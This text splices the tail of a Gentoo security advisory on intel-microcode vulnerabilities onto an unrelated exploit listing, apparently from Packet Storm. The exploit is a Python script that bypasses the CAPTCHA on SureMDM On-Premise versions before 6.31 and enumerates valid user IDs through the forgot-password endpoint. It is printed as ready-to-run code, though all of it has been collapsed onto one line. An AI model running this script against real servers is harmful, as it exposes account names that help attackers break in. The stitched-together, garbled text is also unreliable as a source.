There is no known workaround at this time.

Resolution  
==========

All intel-microcode users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-firmware/intel-microcode-20230214_p20230212"

References  
==========

[ 1 ] CVE-2021-0127  
      https://nvd.nist.gov/vuln/detail/CVE-2021-0127  
[ 2 ] CVE-2021-0146  
      https://nvd.nist.gov/vuln/detail/CVE-2021-0146

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-22

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-22

SureMDM On-Premise versions prior to 6.31 suffer from CAPTCHA bypass and user enumeration vulnerabilities.

    # Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration# Date: 05/12/2023# Exploit Author: Jonas Benjamin Friedli# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/# Version: <= 6.31# Tested on: 6.31# CVE : CVE-2023-3897import requestsimport sysdef print_help():    print("Usage: python script.py [URL] [UserListFile]")    sys.exit(1)def main():    if len(sys.argv) != 3 or sys.argv[1] == '-h':        print_help()    url, user_list_file = sys.argv[1], sys.argv[2]    try:        with open(user_list_file, 'r') as file:            users = file.read().splitlines()    except FileNotFoundError:        print(f"User list file '{user_list_file}' not found.")        sys.exit(1)    valid_users = []    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"    enumerate_txt = "This User ID/Email ID is not registered."    for index, user in enumerate(users):        progress = (index + 1) / len(users) * 100        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")        data = {"UserId": user}        response = requests.post(            f"{url}{bypass_dir}",            json=data,            headers={"Content-Type": "application/json; charset=utf-8"}        )        if response.status_code == 200:            response_data = response.json()            if enumerate_txt not in response_data.get('d', {}).get('message', ''):                valid_users.append(user)    print("\nFinished processing users.")    print(f"Valid Users Found: {len(valid_users)}")    for user in valid_users:        print(user)if __name__ == "__main__":    main()

Source

Packet Storm